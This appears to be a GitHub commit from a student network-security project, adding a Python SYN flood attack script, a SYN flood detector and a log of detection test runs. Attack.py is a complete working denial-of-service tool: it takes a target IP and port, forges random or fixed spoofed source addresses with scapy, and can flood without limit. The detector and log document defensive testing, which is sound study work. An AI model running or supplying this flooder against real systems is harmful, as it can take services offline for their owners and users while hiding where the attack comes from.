Skip to content

Commit

Permalink
Adding project files
Browse files Browse the repository at this point in the history
  • Loading branch information
@fouadtrad
fouadtrad authored Oct 3, 2022
1 parent beea9c3 commit 1643928
Show file tree
Hide file tree
Showing 4 changed files with 774 additions and 0 deletions.
158 changes: 158 additions & 0 deletions Attack.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,158 @@
import ipaddress
from operator import sub
from tabnanny import verbose
from scapy.all import *
import os
import random
import socket
import netifaces



def getSubnet(ip): #mohammad
interfaces = netifaces.interfaces()
subnetmask = ""
for iface in interfaces:
interface = netifaces.ifaddresses(iface)
if(2 in interface.keys()):
physicalInterface = interface[2][0]
if(ip in physicalInterface.values()):
subnetmask = physicalInterface['netmask']
return subnetmask



def getLocalIP(target,port): #chadi
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("192.168.1.122", 80))
ip = s.getsockname()[0]
s.close()
return ip


def getNetwork(target,port): #mohammad
ip = getLocalIP(target,port)
subnet = getSubnet(ip)
network = ipaddress.IPv4Network(ip+"/"+subnet,strict=False)
return network

def random_ip(network): #chadi
network = ipaddress.IPv4Network(network)
network_int, = struct.unpack("!I", network.network_address.packed) # make network address into an integer
rand_bits = network.max_prefixlen - network.prefixlen # calculate the needed bits for the host part
rand_host_int = random.randint(0, 2**rand_bits - 1) # generate random host part
ip_address = ipaddress.IPv4Address(network_int + rand_host_int) # combine the parts
return ip_address.exploded


def SYN_DOS(destIP,destPort,counter,singleIPBool, subIPBool): #chadi
total = 0
network = getNetwork(destIP,destIP)
if singleIPBool and subIPBool:
src_IP = random_ip(network)
print("Attacking from {}",src_IP)

elif singleIPBool and not subIPBool:
src_IP = random_ip('0.0.0.0/0')
print("Attacking from {}",src_IP)

else:
print("Attacking from multiple IPs")

while(total < counter or counter == -1):
sport= random.randint(1000,9000)
seq= random.randint(1000,9000)
window= random.randint(1000,9000)

IP_Packet = IP() #Declaring an IP packet

#Assign the IP address depending on whether it should be fixed or not
if singleIPBool:
IP_Packet.src = src_IP
else:
IP_Packet.src = random_ip(network) if subIPBool else random_ip('0.0.0.0/0')

IP_Packet.dst = destIP #Using the IP address inserted by the attacker (the destination)

TCP_Packet = TCP()
TCP_Packet.sport = sport #Using a random port
TCP_Packet.seq = seq #Using a random sequency number
TCP_Packet.window = window #Using a random window size
TCP_Packet.dport = destPort #Using the port number inserted by the attacker
TCP_Packet.flags = "S" #S flag implying a SYN packet to be sent

packet_to_send = IP_Packet/TCP_Packet
send(packet_to_send , verbose=0) #Stacking up the layers
total +=1
print(str(total) + " Packets Sent",end='\r') #printing number of packets sent
time.sleep(0.01)


def getDestPort(): #mohammad
while(True):
destPort = input("Target Port: ")
try:
destPort = int(destPort) #keep looping until integer
return destPort
except ValueError:
print("Please Enter Integer")


def getNumofPackets(): #mohammad
while(True):
counter = input("How many packets to send (INF/inf for continuous): ")
if(counter == "INF" or counter == 'inf'): #special value for inf
return -1
else:
try:
counter = int(counter) #keep looping until integer
return counter
except ValueError:
print("Please Enter Correct Value")

def getifSingleIP(): #mohammad

while(True): #keep looping until y/n
singleIP = input("Do you want to use a single IP for the attack (Y/N)? ")
if(singleIP == "Y" or singleIP == "y"):
return True
elif (singleIP =="N" or singleIP =="n"):
return False
else:
print("Please Enter Correct Value")

def getifSameSubnet(): #mohammad

while(True): #keep looping until y/n
sameSub = input("Do you want the spoofed IP to be on the same subnet (Y/N)? ")
if(sameSub == "Y" or sameSub == "y"):
return True
elif (sameSub =="N" or sameSub =="n"):
return False
else:
print("Please Enter Correct Value")

def getDestIP(): #Fouad
yourIP = input("Do you want to use your own IP as a victim (Y/N)? ")

if(yourIP == "Y" or yourIP == "y"):
destIP = get_if_addr(conf.iface)
return destIP

elif (yourIP =="N" or yourIP =="n"):
destIP = input("Target IP: ")
return destIP
else:
print("Please Enter Correct Value")

def main(): #mohammad/chadi
os.system("cls") #Clearing the screen
destIP = getDestIP()
print("Destination IP is {}".format(destIP))
destPort = getDestPort()
counter = getNumofPackets()
singleIPBool = getifSingleIP()
subIPBool = getifSameSubnet()
SYN_DOS(destIP,destPort,counter,singleIPBool, subIPBool)

main()
83 changes: 83 additions & 0 deletions Detection.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,83 @@
from scapy.all import *
from collections import Counter
from time import localtime, strftime
import logging
import os


# Anthony
synCount = Counter()
ackCount = Counter()
logging.basicConfig(filename='traffic_analysis.log', format='%(message)s', level=logging.INFO)


# Layan
def analyze (pkt):

#check if IP layer is present in packet
if IP in pkt:
protocol = pkt.getlayer(2).name

#Only analyze packets that are destined to my specific host
if protocol=='TCP' and pkt['IP'].dst == myIP:

if pkt['TCP'].flags.S and pkt['TCP'].dport == port:
src = pkt['IP'].src
synCount[src] += 1

if pkt['TCP'].flags.A and pkt['TCP'].dport == port:
src = pkt['IP'].src
ackCount[src] += 1


# Anthony/Layan
def loggingFnt():

# Anthony
while True:
dateTime = strftime("%d/%m/%Y , %H:%M:%S ,", localtime())
logString = dateTime + " Everything is normal"
time.sleep(3.5)
if len(synCount) > 0:
if (synCount.most_common(1)[0][1] > 3 * ackCount[synCount.most_common(1)[0][0]])and((synCount.most_common(1)[0][1]/sum(synCount.values()))*100 > 80):
logString = dateTime + " SYN attack detected! Attacker IP: " + str(synCount.most_common(1)[0][0]) + " No. of attempts: " + str(synCount.most_common(1)[0][1])

# Layan
elif len(synCount) > 5*len(ackCount) : #Check for half open connections
#else:
logString = dateTime + " SYN attack detected! From multiple IPs "
logging.info(logString)
synCount.clear()
ackCount.clear()

# Anthony
loggingThread=threading.Thread(target=loggingFnt)
loggingThread.daemon=True
loggingThread.start()

# Fouad
os.system("cls") #Clearing the screen
s = socket.socket() # Create a socket object
myIP = get_if_addr(conf.iface) # get ip address of default interface
port = 12345 # Reserve a port for your service
s.bind((myIP, port))
s.listen()
def listen():
def run(self):
Client, address = s.accept()
print('Connected to: ' + address[0] + ':' + str(address[1]))


# Anthony
listenerThread=threading.Thread(target=listen)
listenerThread.daemon=True
listenerThread.start()

print("Server is listening on {}:{}".format(myIP, port))

# Layan
# sniff on loopback (for testing on one device) and default interface (for testing from 2 devices)
sniffer = AsyncSniffer(prn=analyze, store=0, iface = ["\\Device\\NPF_Loopback", conf.iface])
sniffer.start()
while True:
time.sleep(1)
127 changes: 127 additions & 0 deletions traffic_analysis_one_device.log
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,127 @@
03/10/2022 , 20:31:31 , Everything is normal
03/10/2022 , 21:38:00 , Everything is normal
03/10/2022 , 21:38:04 , Everything is normal
03/10/2022 , 21:38:07 , Everything is normal
03/10/2022 , 21:38:11 , Everything is normal
03/10/2022 , 21:38:14 , Everything is normal
03/10/2022 , 21:38:18 , Everything is normal
03/10/2022 , 21:38:21 , Everything is normal
03/10/2022 , 21:38:25 , Everything is normal
03/10/2022 , 21:38:28 , Everything is normal
03/10/2022 , 21:38:32 , Everything is normal
03/10/2022 , 21:38:35 , Everything is normal
03/10/2022 , 21:38:39 , Everything is normal
03/10/2022 , 21:38:42 , Everything is normal
03/10/2022 , 21:38:46 , Everything is normal

single IP same subnet

03/10/2022 , 21:38:49 , SYN attack detected! Attacker IP: 172.20.10.4 No. of attempts: 9
03/10/2022 , 21:38:53 , SYN attack detected! Attacker IP: 172.20.10.4 No. of attempts: 132
03/10/2022 , 21:38:56 , SYN attack detected! Attacker IP: 172.20.10.4 No. of attempts: 131
03/10/2022 , 21:39:00 , SYN attack detected! Attacker IP: 172.20.10.4 No. of attempts: 123
03/10/2022 , 21:39:03 , SYN attack detected! Attacker IP: 172.20.10.4 No. of attempts: 124
03/10/2022 , 21:39:07 , SYN attack detected! Attacker IP: 172.20.10.4 No. of attempts: 123
03/10/2022 , 21:39:10 , SYN attack detected! Attacker IP: 172.20.10.4 No. of attempts: 132
03/10/2022 , 21:39:14 , SYN attack detected! Attacker IP: 172.20.10.4 No. of attempts: 117
03/10/2022 , 21:39:17 , SYN attack detected! Attacker IP: 172.20.10.4 No. of attempts: 126
03/10/2022 , 21:39:21 , SYN attack detected! Attacker IP: 172.20.10.4 No. of attempts: 133
03/10/2022 , 21:39:24 , SYN attack detected! Attacker IP: 172.20.10.4 No. of attempts: 97
03/10/2022 , 21:39:28 , Everything is normal
03/10/2022 , 21:39:31 , Everything is normal
03/10/2022 , 21:39:35 , Everything is normal
03/10/2022 , 21:39:38 , Everything is normal
03/10/2022 , 21:39:42 , Everything is normal
03/10/2022 , 21:39:45 , Everything is normal
03/10/2022 , 21:39:49 , Everything is normal
03/10/2022 , 21:39:52 , Everything is normal
03/10/2022 , 21:39:56 , Everything is normal
03/10/2022 , 21:39:59 , Everything is normal

multiple IPs same subnet

03/10/2022 , 21:40:03 , SYN attack detected! From multiple IPs
03/10/2022 , 21:40:06 , SYN attack detected! From multiple IPs
03/10/2022 , 21:40:10 , SYN attack detected! From multiple IPs
03/10/2022 , 21:40:13 , SYN attack detected! From multiple IPs
03/10/2022 , 21:40:17 , SYN attack detected! From multiple IPs
03/10/2022 , 21:40:20 , SYN attack detected! From multiple IPs
03/10/2022 , 21:40:24 , SYN attack detected! From multiple IPs
03/10/2022 , 21:40:28 , SYN attack detected! From multiple IPs
03/10/2022 , 21:40:31 , SYN attack detected! From multiple IPs
03/10/2022 , 21:40:35 , SYN attack detected! From multiple IPs
03/10/2022 , 21:40:38 , SYN attack detected! From multiple IPs
03/10/2022 , 21:40:42 , SYN attack detected! From multiple IPs
03/10/2022 , 21:40:45 , SYN attack detected! From multiple IPs
03/10/2022 , 21:40:49 , Everything is normal
03/10/2022 , 21:40:52 , Everything is normal
03/10/2022 , 21:40:56 , Everything is normal
03/10/2022 , 21:40:59 , Everything is normal
03/10/2022 , 21:41:03 , Everything is normal
03/10/2022 , 21:41:06 , Everything is normal
03/10/2022 , 21:41:10 , Everything is normal
03/10/2022 , 21:41:13 , Everything is normal
03/10/2022 , 21:41:17 , Everything is normal
03/10/2022 , 21:41:20 , Everything is normal
03/10/2022 , 21:41:24 , Everything is normal
03/10/2022 , 21:41:27 , Everything is normal
03/10/2022 , 21:41:31 , Everything is normal
03/10/2022 , 21:41:34 , Everything is normal
03/10/2022 , 21:41:38 , Everything is normal
03/10/2022 , 21:41:41 , Everything is normal
03/10/2022 , 21:41:45 , Everything is normal
03/10/2022 , 21:41:48 , Everything is normal
03/10/2022 , 21:41:52 , Everything is normal
03/10/2022 , 21:41:55 , Everything is normal
03/10/2022 , 21:41:59 , Everything is normal
03/10/2022 , 21:42:02 , Everything is normal

single IP different subnet

03/10/2022 , 21:42:06 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 100
03/10/2022 , 21:42:09 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 118
03/10/2022 , 21:42:13 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 104
03/10/2022 , 21:42:16 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 123
03/10/2022 , 21:42:20 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 77
03/10/2022 , 21:42:23 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 97
03/10/2022 , 21:42:27 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 92
03/10/2022 , 21:42:30 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 125
03/10/2022 , 21:42:34 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 92
03/10/2022 , 21:42:38 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 114
03/10/2022 , 21:42:41 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 138
03/10/2022 , 21:42:45 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 45
03/10/2022 , 21:42:48 , Everything is normal
03/10/2022 , 21:42:52 , Everything is normal
03/10/2022 , 21:42:55 , Everything is normal
03/10/2022 , 21:42:59 , Everything is normal
03/10/2022 , 21:43:02 , Everything is normal
03/10/2022 , 21:43:06 , Everything is normal
03/10/2022 , 21:43:09 , Everything is normal
03/10/2022 , 21:43:13 , Everything is normal
03/10/2022 , 21:43:16 , Everything is normal

multiple IPs different subnet

03/10/2022 , 21:43:20 , SYN attack detected! From multiple IPs
03/10/2022 , 21:43:23 , SYN attack detected! From multiple IPs
03/10/2022 , 21:43:27 , SYN attack detected! From multiple IPs
03/10/2022 , 21:43:30 , SYN attack detected! From multiple IPs
03/10/2022 , 21:43:34 , SYN attack detected! From multiple IPs
03/10/2022 , 21:43:37 , SYN attack detected! From multiple IPs
03/10/2022 , 21:43:41 , SYN attack detected! From multiple IPs
03/10/2022 , 21:43:44 , SYN attack detected! From multiple IPs
03/10/2022 , 21:43:48 , SYN attack detected! From multiple IPs
03/10/2022 , 21:43:51 , SYN attack detected! From multiple IPs
03/10/2022 , 21:43:55 , SYN attack detected! From multiple IPs
03/10/2022 , 21:43:58 , Everything is normal
03/10/2022 , 21:44:02 , Everything is normal
03/10/2022 , 21:44:05 , Everything is normal
03/10/2022 , 21:44:09 , Everything is normal
03/10/2022 , 21:44:12 , Everything is normal
03/10/2022 , 21:44:16 , Everything is normal
03/10/2022 , 21:44:19 , Everything is normal
03/10/2022 , 21:44:23 , Everything is normal
03/10/2022 , 21:44:26 , Everything is normal
03/10/2022 , 21:44:30 , Everything is normal
03/10/2022 , 21:44:33 , Everything is normal
03/10/2022 , 21:44:37 , Everything is normal
Loading

0 comments on commit 1643928

Please sign in to comment.